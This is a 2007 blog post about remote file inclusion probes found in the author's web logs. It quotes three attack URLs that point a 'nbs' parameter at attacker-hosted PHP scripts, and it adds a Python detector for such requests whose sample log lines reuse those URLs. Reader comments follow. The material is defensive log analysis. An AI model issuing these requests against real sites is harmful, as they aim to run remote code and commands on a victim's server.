Geek Drivel is under attack!
Over the past couple days, I’ve noticed three odd URLs in my web logs, from three different IP addresses, all using different versions of libwww-perl as the browser ID:
/category//includes/global.php?nbs=http://nusay.webng.com/31337.txt???
/category//includes/auth.php?nbs=http://nusay.webng.com/31337.txt??
/category//includes/global.php?nbs=http://usuarios.arnet.com.ar/larry123/safe.txt?
Curious, I checked out the “31337.txt” and “safe.txt” files… they were very similar, both consisting of near-identical PHP instructions that tried to get information about the system and run system commands. It looks like some kind of cross-site scripting attack attempt. I did a Google search on one of the more unique lines and discovered that this is some script-kiddie’s new toy… at least one botnet has been spewing these things out for the last several days. I’m not sure what it’s trying to exploit, but I’m happy to say that WordPress 2.2.2 (just released a few weeks ago, and which I upgraded to almost immediately) seems to be immune to it.
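The log entries above share one detectable shape: a query parameter whose value is itself a remote URL, the pattern typical of remote file inclusion probes. The following is an added example, not code from the original post, that flags such requests in Combined Log Format lines. The function name, the IP addresses, timestamps, status codes and user-agent version strings are constructed; only the request paths come from the post.

```python
import re
from urllib.parse import parse_qsl

# Combined Log Format: client IP, request line, status, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
# A parameter value that starts with a remote scheme.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.I)

# Constructed sample lines. Request paths are the ones quoted in the post;
# IPs (documentation ranges), timestamps, statuses and UA versions are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Aug/2007:03:11:54 -0400] "GET /category//includes/global.php?nbs=http://nusay.webng.com/31337.txt??? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"',
    '198.51.100.4 - - [22/Aug/2007:17:40:02 -0400] "GET /category//includes/auth.php?nbs=http://nusay.webng.com/31337.txt?? HTTP/1.1" 404 512 "-" "libwww-perl/5.79"',
    '203.0.113.7 - - [23/Aug/2007:09:02:31 -0400] "GET /category//includes/global.php?nbs=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 512 "-" "libwww-perl/5.803"',
    '192.0.2.55 - - [23/Aug/2007:09:05:00 -0400] "GET /?p=123 HTTP/1.1" 200 18432 "-" "Mozilla/5.0"',
    '192.0.2.56 - - [23/Aug/2007:09:06:10 -0400] "GET /wp-login.php?redirect_to=http://example.org/wp-admin/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

def find_remote_include_probes(lines, allowed_params=frozenset()):
    """Return one record per query parameter whose value is a remote URL.

    allowed_params names parameters that legitimately carry URLs
    (for example a login redirect) and are skipped.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than guess
        _path, _, query = m['target'].partition('?')
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name not in allowed_params and REMOTE_RE.match(value):
                hits.append({
                    'ip': m['ip'],
                    'status': int(m['status']),
                    'param': name,
                    'value': value,
                    # Scripted client, as with the libwww-perl IDs in the post.
                    'scripted_client': 'libwww-perl' in m['ua'].lower(),
                })
    return hits

if __name__ == '__main__':
    for hit in find_remote_include_probes(SAMPLE_LOG, {'redirect_to'}):
        print(hit)
```

Without an allow-list the login redirect in the last sample line is reported too, so parameters that legitimately carry URLs need to be listed per site.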
August 23rd, 2007 at 9:14 pm
Not only that, your blog is under attack by reddit readers! Aieee!
August 23rd, 2007 at 11:35 pm
Not to mention ycombinator readers.
August 24th, 2007 at 8:05 am
Well, at least you’re not being slashdotted.
September 3rd, 2007 at 10:55 pm
Closing comments, as this entry has suddenly become a spam-magnet.